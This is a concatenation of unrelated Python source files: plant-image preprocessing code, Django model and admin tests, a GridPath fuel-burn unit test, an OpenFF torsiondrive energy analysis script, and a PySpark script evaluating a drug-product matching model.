logging.debug(self.data_dict['label'].shape)
print('minidataset generated:',self.data_dict['label'].shape)
return self.data_dict
def test_data_read(self):
for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (224, 224))
image_stack = self.segment_plant(image)
image_stack = self.sharpen_image(image_stack)
image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
image_stack = np.reshape(image_stack, (224, 224, 1))
input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
self.test_dict['image'].append(input)
self.test_dict['id'].append(image_path.split('\\')[-1])
self.test_dict['image'] = np.array(self.test_dict['image']).swapaxes(1,3)
print('predictset generated:',self.test_dict['image'].shape)
return self.test_dict
def test_data_read_simple(self, size=299):
for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (size, size))
# image_stack = self.segment_plant(image)
# image_stack = self.sharpen_image(image_stack)
# image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
# image_stack = np.reshape(image_stack, (224, 224, 1))
# input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
input = image
self.test_dict['image'].append(input)
self.test_dict['id'].append(image_path.split('\\')[-1])
self.test_dict['image'] = np.array(self.test_dict['image']).swapaxes(1,3)
print('predictset generated:',self.test_dict['image'].shape)
return self.test_dict
def test_data_read_simple2(self, size=299, transform=None):
for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (size, size))
# image_stack = self.segment_plant(image)
# image_stack = self.sharpen_image(image_stack)
# image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
# image_stack = np.reshape(image_stack, (224, 224, 1))
# input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
input = transform(image)
self.test_dict['image'].append(input)
self.test_dict['id'].append(image_path.split('\\')[-1])
self.test_dict['image'] = torch.stack(self.test_dict['image'], dim=0)
#self.test_dict['image'] = np.array(self.test_dict['image']).swapaxes(1,3)
print('predictset generated:',self.test_dict['image'].size())
return self.test_dict
def read_image_single(self, image_path):
image = cv2.imread(image_path, cv2.IMREAD_COLOR)
image = cv2.resize(image, (224, 224))
image_stack = self.segment_plant(image)
image_stack = self.sharpen_image(image_stack)
image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
image_stack = np.reshape(image_stack, (224, 224, 1))
input = np.concatenate((np.array(image), np.array(image_stack)), axis=2)
test_input = np.array([input]).swapaxes(1,3)
return test_input
if __name__ == '__main__':
preprocessing = Preprocessing()
#preprocessing.test_data_read()
#data = preprocessing.read_image()
transform2 = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
]
)
preprocessing.test_data_read_simple2(transform=transform2)
|
<reponame>9sneha-n/pari
from django.contrib.auth.models import User
from django.test import TestCase, Client
from django.db import DataError, IntegrityError
from author.forms import AuthorAdminForm
from author.models import Author
from functional_tests.factory import AuthorFactory
class AuthorModelTests(TestCase):
def test_author_string_representaion(self):
assert str(AuthorFactory()) == '<NAME>'
def test_author_slug_for_multiple_unique_author_name(self):
author_name = 'Author Name Author Name Author Name Author Name Author Name'
author1 = Author(name=author_name)
author2 = Author(name=author_name + ' ')
author3 = Author(name=author_name + '. ')
author1.save()
author2.save()
author3.save()
assert Author.objects.get(name=author_name).slug == 'author-name-author-name-author-name-author-name-au'
assert Author.objects.get(name=author_name + ' ').slug == 'author-name-author-name-author-name-author-name-a1'
assert Author.objects.get(name=author_name + '. ').slug == 'author-name-author-name-author-name-author-name-a2'
class AuthorModelsExceptionTest(TestCase):
def test_should_throw_error_if_author_name_exceeds_hundred_characters(self):
author_name = 'Full Metal Havok More Sexy N Intelligent Than Spock And All The Superheroes Combined With Frostnova nova';
author_with_long_name = Author(name=author_name)
with self.assertRaises(DataError) as context_message:
author_with_long_name.save()
def test_should_throw_error_if_author_already_exist(self):
author_one = Author(name='some author')
author_two = Author(name='some author')
with self.assertRaises(IntegrityError) as context_message:
author_one.save()
author_two.save()
def test_should_throw_error_if_facebook_and_twitter_name__of_author_exceeds_fifty_characters(self):
with self.assertRaises(DataError) as context_message:
AuthorFactory(name='some author',
twitter_username='JAMIEREDGATE:OggtheCleverFullMetalHavokMoreKnowledgeNIntelligentThanSpockAndAll')
AuthorFactory(name='some good author',
facebook_username='JAMIEREDGATE:OggtheCleverFullMetalHavokMoreKnowledgeNIntelligentThanSpockAndAll')
class AuthorAdminFormTest(TestCase):
def test_author_form_should_not_have_fields_image_and_slug(self):
author_form = AuthorAdminForm()
self.assertEqual('image' in author_form.fields, False, msg="AuthorAdminForm should not contain field image")
self.assertEqual('slug' in author_form.fields, False, msg="AuthorAdminForm should not contain field slug")
def test_author_form_should_be_in_valid_if_mandatory_fields_are_empty(self):
author_form = AuthorAdminForm()
self.assertEqual(author_form.is_valid(), False)
class AuthorViewsTest(TestCase):
def setUp(self):
self.client = Client()
User.objects.create_superuser('pari', '<EMAIL>', "pari")
def test_should_allow_only_authorized_user_to_add_author(self):
response = self.client.post('/admin/authors/add/', content_type="application/json", data="{'name':'cool'}")
self.assertEqual(response.status_code, 302)
self.assertRegexpMatches(response.url, '/admin/login',
msg="Unauthorized users should be redirected to login page")
def test_should_save_author_for_valid_form_data(self):
self.login_admin()
data = 'name=cool'
response = self.client.post('/admin/authors/add/', data=data,
content_type='application/x-www-form-urlencoded')
self.assertEqual(response.status_code, 200)
author_from_db = Author.objects.get(slug='cool')
self.assertEqual(author_from_db.name,'cool')
def test_should_add_translator_or_photographers_redirect_to_add_author_form(self):
self.login_admin()
response_for_add_translator = self.client.get('/admin/translators/add/')
self.assertEqual(response_for_add_translator.status_code, 302)
self.assertRegexpMatches(response_for_add_translator.url, "/admin/authors/add/", msg="Add translators should redirect to add author")
response_for_add_photgraphers = self.client.get('/admin/photographers/add/')
self.assertEqual(response_for_add_photgraphers.status_code, 302)
self.assertRegexpMatches(response_for_add_photgraphers.url, "/admin/authors/add/", msg="Add translators should redirect to add author")
def login_admin(self):
self.client.login(username="pari", password="<PASSWORD>")
|
# Copyright 2016-2022 Blue Marble Analytics LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from builtins import str
from importlib import import_module
import os.path
import sys
import unittest
from tests.common_functions import create_abstract_model, add_components_and_load_data
TEST_DATA_DIRECTORY = os.path.join(
os.path.dirname(__file__), "..", "..", "..", "test_data"
)
# Import prerequisite modules
PREREQUISITE_MODULE_NAMES = [
"temporal.operations.timepoints",
"temporal.operations.horizons",
"temporal.investment.periods",
"geography.load_zones",
"geography.fuel_burn_limit_balancing_areas",
"system.policy.fuel_burn_limits.fuel_burn_limits",
"project",
"project.capacity.capacity",
"project.availability.availability",
"project.fuels",
"project.operations",
"project.operations.operational_types",
"project.operations.power",
"project.operations.fuel_burn",
]
NAME_OF_MODULE_BEING_TESTED = (
"system.policy.fuel_burn_limits.aggregate_project_fuel_burn"
)
IMPORTED_PREREQ_MODULES = list()
for mdl in PREREQUISITE_MODULE_NAMES:
try:
imported_module = import_module("." + str(mdl), package="gridpath")
IMPORTED_PREREQ_MODULES.append(imported_module)
except ImportError:
print("ERROR! Module " + str(mdl) + " not found.")
sys.exit(1)
# Import the module we'll test
try:
MODULE_BEING_TESTED = import_module(
"." + NAME_OF_MODULE_BEING_TESTED, package="gridpath"
)
except ImportError:
print("ERROR! Couldn't import module " + NAME_OF_MODULE_BEING_TESTED + " to test.")
class TestAggregateProjectFuelBurn(unittest.TestCase):
""" """
def test_add_model_components(self):
"""
Test that there are no errors when adding model components
:return:
"""
create_abstract_model(
prereq_modules=IMPORTED_PREREQ_MODULES,
module_to_test=MODULE_BEING_TESTED,
test_data_dir=TEST_DATA_DIRECTORY,
subproblem="",
stage="",
)
def test_load_model_data(self):
"""
Test that data are loaded with no errors
:return:
"""
add_components_and_load_data(
prereq_modules=IMPORTED_PREREQ_MODULES,
module_to_test=MODULE_BEING_TESTED,
test_data_dir=TEST_DATA_DIRECTORY,
subproblem="",
stage="",
)
def test_data_loaded_correctly(self):
"""
Test components initialized with data as expected
:return:
"""
m, data = add_components_and_load_data(
prereq_modules=IMPORTED_PREREQ_MODULES,
module_to_test=MODULE_BEING_TESTED,
test_data_dir=TEST_DATA_DIRECTORY,
subproblem="",
stage="",
)
instance = m.create_instance(data)
# Set: PRJ_FUEL_BURN_LIMIT_BAS
expected_prj_fuel_ba = sorted(
[
("Gas_CCGT", "Gas", "Zone1"),
("Coal", "Coal", "Zone1"),
("Gas_CT", "Gas", "Zone1"),
("Gas_CCGT_New", "Gas", "Zone1"),
("Gas_CCGT_New_Binary", "Gas", "Zone1"),
("Gas_CT_New", "Gas", "Zone1"),
("Coal_z2", "Coal", "Zone2"),
]
)
actual_prj_fuel_ba = sorted(
[(prj, f, ba) for (prj, f, ba) in instance.PRJ_FUEL_BURN_LIMIT_BAS]
)
self.assertListEqual(expected_prj_fuel_ba, actual_prj_fuel_ba)
# Set: PRJ_FUELS_WITH_LIMITS
expected_prj_fuel_w_limits = sorted(
[
("Gas_CCGT", "Gas"),
("Coal", "Coal"),
("Gas_CT", "Gas"),
("Gas_CCGT_New", "Gas"),
("Gas_CCGT_New_Binary", "Gas"),
("Gas_CT_New", "Gas"),
("Coal_z2", "Coal"),
]
)
actual_prj_fuel_w_limits = sorted(
[(prj, f) for (prj, f) in instance.PRJ_FUELS_WITH_LIMITS]
)
self.assertListEqual(expected_prj_fuel_w_limits, actual_prj_fuel_w_limits)
# Set: PRJS_BY_FUEL_BA
expected_prj_by_fuel_ba = {
("Gas", "Zone1"): sorted(
[
"Gas_CCGT",
"Gas_CT",
"Gas_CCGT_New",
"Gas_CCGT_New_Binary",
"Gas_CT_New",
]
),
("Coal", "Zone1"): sorted(["Coal"]),
("Coal", "Zone2"): sorted(["Coal_z2"]),
("Nuclear", "Zone1"): sorted([]),
}
actual_prj_by_fuel_ba = {
(f, ba): sorted([prj for prj in instance.PRJS_BY_FUEL_BA[f, ba]])
for (f, ba) in instance.PRJS_BY_FUEL_BA
}
self.assertDictEqual(expected_prj_by_fuel_ba, actual_prj_by_fuel_ba)
if __name__ == "__main__":
unittest.main()
|
<gh_stars>1-10
import json
import os
import pickle
import offsb.qcarchive
import offsb.qcarchive.qcatree as qca
import offsb.rdutil.mol
import offsb.tools.const
import qcfractal.interface as ptl
import simtk.openmm.openmm
import simtk.unit
from offsb.op import geometry, openforcefield, openmm
from offsb.search import smiles
# The openff forcefield version to use for calculations below
version = "1.2.0"
# The unique identifier for this job.
# We are going to do an OpenMM minimization on the TD, so lets call this opt
name = "opt"
def match_td_smiles(QCA, smitree, indices):
"""
From a SMARTS search, pull out the torsiondrives that match
Parameters
----------
QCA : offsb.qcarchive.qcatree.QCATree
The object holding the index and data of QCArchive objects
smitree : offsb.op.smiles.SmilesSearchTree
The object that performed the SMARTS searching on the QCA object
indices : List[int]
A 1-index list of indices used to determine the match. If a mapped
SMARTS pattern was used and the exact pattern is desired, set this
to [1,2,3,4]. If any torsiondrive matching the inner rotatable bond
is desired, set this to [2,3], indicating that only the inner indices
must match.
Returns
-------
match_entries : List[offsb.treedi.node.Node]
A list of nodes corresponding to QCArchive TDEntry objects
"""
match_entries = list()
for node in QCA.node_iter_depth_first(QCA.root(), select="Entry"):
if node.payload not in smitree.db:
continue
# these are the indices of everything that matched in the smiles operation
group_smi_list = smitree.db[node.payload]["data"]
CIEHMS = "canonical_isomeric_explicit_hydrogen_mapped_smiles"
smi = QCA.db[node.payload]["data"].attributes[CIEHMS]
mol = offsb.rdutil.mol.build_from_smiles(smi)
map_idx = offsb.rdutil.mol.atom_map(mol)
map_inv = {v - 1: k for k, v in map_idx.items()}
dihedral = QCA.db[node.payload]["data"].td_keywords.dihedrals[0]
# Try to detect the special case where we want the rotatable bond
if len(indices) == 2:
dihedral = tuple(dihedral[1:3])
elif len(indices) != 4:
raise Exception(
"Only able to search a torsiondrive with 4 indices. If two indices are given, we assume it is the inner rotatable bond"
)
dihedral = tuple([map_inv[i] for i in dihedral])
if dihedral[-1] < dihedral[0]:
dihedral = dihedral[::-1]
found = False
for pattern, matches in group_smi_list.items():
if len(matches) == 0:
continue
for match in matches:
# The supplied indices are 1-indexed, since they are coupled
# to the CMILES map e.g. [*:2][*:1][*:3]
smi = tuple([match[i - 1] for i in indices])
if smi[-1] < smi[0]:
smi = smi[::-1]
smi = tuple(smi)
# This is a match
if smi == dihedral:
match_entries.append(node)
found = True
break
if found:
break
return match_entries
def save(tree):
name = os.path.join(".", tree.name + ".p")
print("Saving: ", tree.ID, "as", name, end=" ... ")
tree.to_pickle(db=True, name=name)
print("{:12.1f} MB".format(os.path.getsize(name) / 1024 ** 2))
if False:
# TODO: needs work still as ui can't be imported
# Load a list of datasets and build the index
# "datasets" is a file of datasets to load
datasets = offsb.ui.qcasb.load_dataset_input("datasets")
QCA = offsb.ui.qcasb.QCArchiveSpellBook(datasets=datasets).QCA
else:
# Just a quick shortcut to get something going
client = ptl.FractalClient()
ds = client.get_collection(
"TorsionDriveDataset", "OpenFF Gen 2 Torsion Set 1 Roche"
)
QCA = QCA = qca.QCATree("QCA", root_payload=client, node_index=dict(), db=dict())
drop = ["Intermediates", "Hessian"]
QCA.build_index(ds, drop=drop, keep_specs=["default"])
save(QCA)
entries = list(QCA.node_iter_depth_first(QCA.root(), select="Entry"))
print("There are {:d} entries total".format(len(entries)))
# The general query on the dataset.
# The results respect the key, and will only return those indices if specified
# If no key is specified, then the indices are in order as they appear in the string
query = smiles.SmilesSearchTree(
"[#7X3:2](~[#1:1])(~[#6])~[#6:3]=[O:4]", QCA, name="smiles"
)
query.apply(targets=entries)
if True:
# This is the torsion drive we are looking for
# For whatever reason, the mapped indices are not respected, so need the map
#
# It is possible to select just a subset of the above search.
# For example matching [2,3] will match any torsiondrive with the same
# rotatable bond
#
# This is 1-indexing
#
# This will search for the exact torsion specified above
# tmap = [1, 2, 3, 4]
# This will search for *any* torsion that was driven which matches the
# rotatable bound find in the above search. Useful when we found the pattern,
# but a slightly different torsion was driven (but on the same bond)
tmap = [2, 3]
# Use this to only focus on the TDs that match the query
entries = match_td_smiles(QCA, query, tmap)
else:
# This will retreive all entries that matched the query
# First, pull the entries that the SMARTS matcher recorded
keys = [n for n in query.db if len(query.db[n]["data"]) > 0]
# Then pull those entries from the dataset
entries = [e for e in entries if e.payload in keys]
print("There are {:d} entries that match".format(len(entries)))
# Download the optimized geometries of the entries of interest
# If torsiondrives, this will download all optimization results
# QCA.cache_optimization_minimum_molecules(nodes=entries)
# This downloads just the "best" optimization per angle for TDs
QCA.cache_torsiondriverecord_minimum_molecules(nodes=entries)
# Save for use later with the newly cached molecules
save(QCA)
###############################################################################
# Perform an OpenMM Energy evaluation
oMM_name = "oFF-" + name + "-" + version
if os.path.exists(oMM_name + ".p"):
with open(oMM_name + ".p", "rb") as fid:
oMM = pickle.load(fid)
else:
# Calculate MM energies of the TD snapshots
oMM = openmm.OpenMMEnergy(
"openff_unconstrained-" + version + ".offxml", QCA, oMM_name
)
# This will (not) try to do a minimization starting from the TD optimized geometries
oMM.minimize = True
oMM.processes = 8
# Whether to use geometric for the minimization (True), or the native OpenMM minimizer (False)
oMM.use_geometric = False
# This will also add the same contraints used in the TD optimizations
# Turn this minimization and this on if you want the MM-minimized TD
oMM.constrain = True
# Perform the calculation; this could take some time depending on the number
# of entries
oMM.apply(targets=entries)
save(oMM)
###############################################################################
# Apply the force field labeler
oFF_name = "labels-" + name + "-" + version
if os.path.exists(oFF_name + ".p"):
with open(oFF_name + ".p", "rb") as fid:
oFF = pickle.load(fid)
else:
oFF = openforcefield.OpenForceFieldTree(
QCA,
oFF_name,
"openff_unconstrained-" + version + ".offxml",
)
oFF.apply(targets=entries)
save(oFF)
# This is the regular output
fid = open("test" + name + version + ".dat", "w")
# This is raw data with just numbers
fid2 = open("test" + name + version, "w")
smidb = query
# Now go through the QM, MM, and SMARTS data and aggregate
for entry_nr, entry in enumerate(entries):
if entry.payload not in smidb.db:
# Shouldn't happen, but check just in case
print("This entry not in the SMARTS match list")
continue
idx = smidb.db[entry.payload]["data"]
if idx == []:
# Probably also shouldn't happen..
print("Not a match")
continue
###########################################################################
# Need to recompute the QCA dihedral map -> CMILES for labeler mapping
CIEHMS = "canonical_isomeric_explicit_hydrogen_mapped_smiles"
smi = QCA.db[entry.payload]["data"].attributes[CIEHMS]
mmol = offsb.rdutil.mol.build_from_smiles(smi)
map_idx = offsb.rdutil.mol.atom_map(mmol)
# This inverse map takes QCA indices and sends to CMILES indices
map_inv = {v - 1: k for k, v in map_idx.items()}
###########################################################################
molecules = list(QCA.node_iter_depth_first(entry, select="Molecule"))
qmenes = {}
mmenes = {}
min_id = None
qmmin = None
mmmin = None
molecules_with_angle = []
# First pass through the molecules to get the minimimum energy for
# calculating a reference, and getting the constraint angles for sorting
for molecule_node in molecules:
if molecule_node.payload not in oMM.db:
print("case 1")
continue
molecule = oMM.db[molecule_node.payload]["data"]
if molecule == []:
print("case 2")
continue
optimization = QCA.db[
next(QCA.node_iter_to_root(molecule_node, select="Optimization")).payload
]
ene = optimization["data"]["energies"][-1]
if (
oMM.db[molecule_node.payload]["data"]["energy"] is not None
and len(optimization["data"]["energies"]) > 0
):
if qmmin is None or ene < qmmin:
qmmin = ene
min_id = molecule_node.payload
qmenes[molecule_node.payload] = ene
mmenes[molecule_node.payload] = oMM.db[molecule_node.payload]["data"][
"energy"
]
constr = []
constraints = list(QCA.node_iter_to_root(molecule_node, select="Constraint"))
if len(constraints) > 0:
constr = list(constraints[0].payload[1])
val = constraints[0].payload[2]
molecules_with_angle.append([val, molecule_node])
mmmin = oMM.db[min_id]["data"]["energy"]
molecules = sorted(molecules_with_angle, key=lambda x: x[0])
# for molecule_node in QCA.node_iter_depth_first(entry, select="Molecule"):
for mol_nr, molecule_node in enumerate(molecules):
constr_val, molecule_node = molecule_node
if molecule_node.payload not in oMM.db:
continue
# This can be just an energy, or a whole new molecule if the OpenMM
# energy calculation used minimize=True
omm_result = oMM.db[molecule_node.payload]["data"]
if omm_result == []:
continue
if oMM.db[molecule_node.payload]["data"]["energy"] is None:
continue
optimization = QCA.db[
next(QCA.node_iter_to_root(molecule_node, select="Optimization")).payload
]
qene = optimization["data"]["energies"][-1] - qmmin
constr = []
constraints = list(QCA.node_iter_to_root(molecule_node, select="Constraint"))
if len(constraints) > 0:
constr = list(constraints[0].payload[1])
# Depending on what the reference spec is, this could be a plain float
# (from e.g. QM calculations) or a fancy object with units (OpenMM)
if issubclass(type(qene), simtk.unit.quantity.Quantity):
qene /= simtk.unit.kilocalories_per_mole
else:
# Assumes unitless from QCA are in au
qene *= offsb.tools.const.hartree2kcalmol
mene = oMM.db[molecule_node.payload]["data"]["energy"] - mmmin
if issubclass(type(mene), simtk.unit.quantity.Quantity):
mene /= simtk.unit.kilocalories_per_mole
qcmol = QCA.db[molecule_node.payload]["data"]
print(entry, molecule_node, end="\n")
fid.write("{:s} {:s}\n".format(entry.__repr__(), molecule_node.__repr__()))
# Only caring about 1D torsions for now
for i in [constr]:
# Get the indices of the driven torsion that will correspond to
# what CMILES-ordered molecules use (e.g. the FF labeler)
mapped_dihedral = tuple([map_inv[j] for j in i])
if mapped_dihedral[0] > mapped_dihedral[-1]:
mapped_dihedral = tuple(mapped_dihedral[::-1])
print("Complete key is", i)
if len(i) != 4:
continue
if True:
# If we want to save the molecule to
tdr = next(QCA.node_iter_to_root(molecule_node, select="TorsionDrive"))
mode = "w" if mol_nr == 0 else "a"
with open(
"TD-{:s}.QMMin.xyz".format(tdr.payload),
mode,
) as fd:
offsb.qcarchive.qcmol_to_xyz(
qcmol,
fd=fd,
comment=json.dumps(i)
+ str(constr_val)
+ " {:s} {:s}".format(
molecule_node.payload, molecule_node.index
),
)
if (
oMM.db[molecule_node.payload]["data"].get("schema_name", "")
== "qcschema_molecule"
):
qcmmmol = oMM.db[molecule_node.payload]["data"]
with open(
"TD-{:s}.MMMin.xyz".format(tdr.payload),
mode,
) as fd:
offsb.qcarchive.qcmol_to_xyz(
qcmmmol,
fd=fd,
comment=json.dumps(i)
+ str(constr_val)
+ "MM energy: "
+ str(oMM.db[molecule_node.payload]["data"].get("energy", None))
+ " {:s} {:s}".format(
molecule_node.payload, molecule_node.index
),
)
angle = geometry.TorsionOperation.measure_praxeolitic_single(
qcmol["geometry"], i
)
if "geometry" in omm_result:
# Measure the angle directly from the MM minimization (mostly to ensure everything went OK)
anglemin = geometry.TorsionOperation.measure_praxeolitic_single(
omm_result["geometry"], i
)
else:
# No minimization, so the QM and MM angles are the same
anglemin = angle
# Labels are stored at the entry level since all entry molecules have the same labels
label = oFF.db[entry.payload]["data"]["ProperTorsions"][mapped_dihedral]
out_str = "{:3d}-{:3d}-{:3d}-{:3d} TD_Angle= {:10.2f} AngleMin= {:10.2f} QM_Energy= {:10.2f} MM_Energy= {:10.2f} Label= {}\n".format(
*i, angle, anglemin, qene, mene, label
)
print(out_str, end="")
fid.write(out_str)
# This is just the data, no strings attached
fid2.write(
"{:4d} {:f} {:f} {:f} {:f}\n".format(
entry_nr, angle, anglemin, qene, mene
)
)
print()
fid.write("\n")
fid.close()
fid2.close()
|
# -*- coding: utf-8 -*-
"""<EMAIL>.
功能描述:job3:left join cpa和prod
* @author yzy
* @version 0.0
* @since 2020/08/12
* @note 落盘数据:cpa_prod_join
"""
import os
from pyspark.sql import SparkSession
from dataparepare import *
from interfere import *
from pyspark.sql.types import *
from pyspark.sql.functions import desc
from pyspark.sql.functions import rank
from pyspark.sql import Window
from pyspark.ml.linalg import Vectors, VectorUDT
from pyspark.ml.classification import MultilayerPerceptronClassificationModel
from pyspark.ml.classification import DecisionTreeClassificationModel
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
from pyspark.ml import PipelineModel
from pdu_feature import similarity, hit_place_prediction, dosage_replace, prod_name_replace, pack_replace
from pyspark.ml.feature import VectorAssembler
def prepare():
os.environ["PYSPARK_PYTHON"] = "python3"
# 读取s3桶中的数据
spark = SparkSession.builder \
.master("yarn") \
.appName("CPA&GYC match refactor") \
.config("spark.driver.memory", "1g") \
.config("spark.executor.cores", "2") \
.config("spark.executor.instances", "4") \
.config("spark.executor.memory", "2g") \
.config('spark.sql.codegen.wholeStage', False) \
.getOrCreate()
access_key = os.getenv("AWS_ACCESS_KEY_ID")
secret_key = os.getenv("AWS_SECRET_ACCESS_KEY")
if access_key is not None:
spark._jsc.hadoopConfiguration().set("fs.s3a.access.key", access_key)
spark._jsc.hadoopConfiguration().set("fs.s3a.secret.key", secret_key)
spark._jsc.hadoopConfiguration().set("fs.s3a.impl","org.apache.hadoop.fs.s3a.S3AFileSystem")
spark._jsc.hadoopConfiguration().set("com.amazonaws.services.s3.enableV4", "true")
# spark._jsc.hadoopConfiguration().set("fs.s3a.aws.credentials.provider","org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider")
spark._jsc.hadoopConfiguration().set("fs.s3a.endpoint", "s3.cn-northwest-1.amazonaws.com.cn")
return spark
if __name__ == '__main__':
spark = prepare()
# 1. load the data
df_result = load_training_data(spark)
df_validate = df_result #.select("id", "label", "features").orderBy("id")
# 2. load model
model = PipelineModel.load("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/rf")
# 3. compute accuracy on the test set
predictions = model.transform(df_validate)
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions)
print("Test Error = %g " % (1.0 - accuracy))
print("Test set accuracy = " + str(accuracy))
# 4. Test with Pharbers defined methods
result = predictions
# result.printSchema()
result = result.withColumn("JACCARD_DISTANCE_MOLE_NAME", result.JACCARD_DISTANCE[0]) \
.withColumn("JACCARD_DISTANCE_DOSAGE", result.JACCARD_DISTANCE[1]) \
.drop("JACCARD_DISTANCE", "features", "indexedFeatures").drop("rawPrediction", "probability")
# result.orderBy("id").repartition(1).write.mode("overwrite").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/result")
df_ph = result.where((result.prediction == 1.0) | (result.label == 1.0))
ph_total = result.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
print("数据总数: " + str(ph_total))
print("数据总数: " + str(ph_total))
# 5. 尝试解决多高的问题
df_true_positive = similarity(result.where(result.prediction == 1.0))
df_true_positive = df_true_positive.where(df_true_positive.RANK == 1)
ph_positive_prodict = df_true_positive.count()
print("机器判断第一轮TP条目 = " + str(ph_positive_prodict))
ph_positive_hit = result.where((result.prediction == result.label) & (result.label == 1.0)).count()
print("其中正确条目 = " + str(ph_positive_hit))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
if ph_positive_prodict == 0:
print("Pharbers Test set accuracy (机器判断第一轮TP比例) = 0")
print("Pharbers Test set precision (机器判断第一轮TP正确率) = 0")
else:
print("Pharbers Test set accuracy (机器判断第一轮TP比例) = " + str(ph_positive_hit / ph_total))
print("Pharbers Test set precision (机器判断第一轮TP正确率) = " + str(ph_positive_hit / ph_positive_prodict))
# for analysis
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 0.0) & (result.label == 1.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/false_negative")
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 1.0) & (result.label == 0.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/false_positive")
# for output
# df_true_positive.orderBy("id").repartition(1) \
# .where((result.prediction == 1.0) & (result.label == 0.0)) \
# .write.mode("overwrite").option("header", "true").csv("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/tmp/dt_predictions/prediction")
# 6. 第二轮筛选TP
df_true_positive = df_true_positive.select("id").distinct()
id_local = df_true_positive.toPandas()["id"].tolist() # list的内容是上一步确定TP的id
df_candidate = result.where(~result.id.isin(id_local)) # df_candidate 是上一步选出的TP的剩下的数据,进行第二轮
count_prediction_se = df_candidate.groupBy("id").agg({"prediction": "first", "label": "first"}).count()
print("第二轮总量= " + str(count_prediction_se))
# 第二轮筛选的方法是:再对dosage列重新计算eff,要用到dosage_mapping
df_second_round = df_candidate.drop("prediction", "indexedLabel", "indexedFeatures", "rawPrediction", "probability", "features")
dosage_mapping = load_dosage_mapping(spark)
df_second_round.show(5)
df_second_round = df_second_round.join(dosage_mapping, df_second_round.DOSAGE == dosage_mapping.CPA_DOSAGE, how="left").na.fill("")
df_second_round = df_second_round.withColumn("EFFTIVENESS_DOSAGE_SE", dosage_replace(df_second_round.MASTER_DOSAGE, \
df_second_round.DOSAGE_STANDARD, df_second_round.EFFTIVENESS_DOSAGE))
df_second_round = df_second_round.withColumn("EFFTIVENESS_PRODUCT_NAME_SE", prod_name_replace(df_second_round.MOLE_NAME, df_second_round.MOLE_NAME_STANDARD, \
df_second_round.MANUFACTURER_NAME, df_second_round.MANUFACTURER_NAME_STANDARD, df_second_round.MANUFACTURER_NAME_EN_STANDARD))
df_second_round = df_second_round.withColumn("EFFTIVENESS_PACK_QTY_SE", pack_replace(df_second_round.EFFTIVENESS_PACK_QTY, df_second_round.SPEC_ORIGINAL, \
df_second_round.PACK_QTY, df_second_round.PACK_QTY_STANDARD))
assembler = VectorAssembler( \
inputCols=["EFFTIVENESS_MOLE_NAME", "EFFTIVENESS_PRODUCT_NAME_SE", "EFFTIVENESS_DOSAGE_SE", "EFFTIVENESS_SPEC", \
"EFFTIVENESS_PACK_QTY_SE", "EFFTIVENESS_MANUFACTURER"], \
outputCol="features")
df_second_round = assembler.transform(df_second_round)
# df_second_round.repartition(10).write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/second_round_dt")
predictions_second_round = model.transform(df_second_round)
predictions_second_round.write.mode("overwrite").parquet("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/zyyin/second_round_prediction1106_1")
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions_second_round)
print("Test Error = %g " % (1.0 - accuracy))
print("Test set accuracy = " + str(accuracy))
# 第二轮正确率检测
df_true_positive_se = predictions_second_round.where(predictions_second_round.prediction == 1.0)
ph_positive_prodict_se = df_true_positive_se.count()
print("机器判断第二轮TP条目 = " + str(ph_positive_prodict_se))
ph_positive_hit_se = df_true_positive_se.where((df_true_positive_se.prediction == df_true_positive_se.label) & (df_true_positive_se.label == 1.0)).count()
print("其中正确条目 = " + str(ph_positive_hit_se))
# ph_negetive_hit = result.where(result.prediction != result.label).count()
if ph_positive_prodict_se == 0:
print("Pharbers Test set accuracy (机器判断第二轮TP比例) = 0")
print("Pharbers Test set precision (机器判断第二轮TP正确率) = 0")
else:
print("Pharbers Test set accuracy (机器判断第二轮TP比例) = " + str(ph_positive_hit_se / count_prediction_se))
print("Pharbers Test set precision (机器判断第二轮TP正确率) = " + str(ph_positive_hit_se / ph_positive_prodict_se))
# 7. 两轮估算总量
ph_positive_prodict = ph_positive_prodict + ph_positive_prodict_se
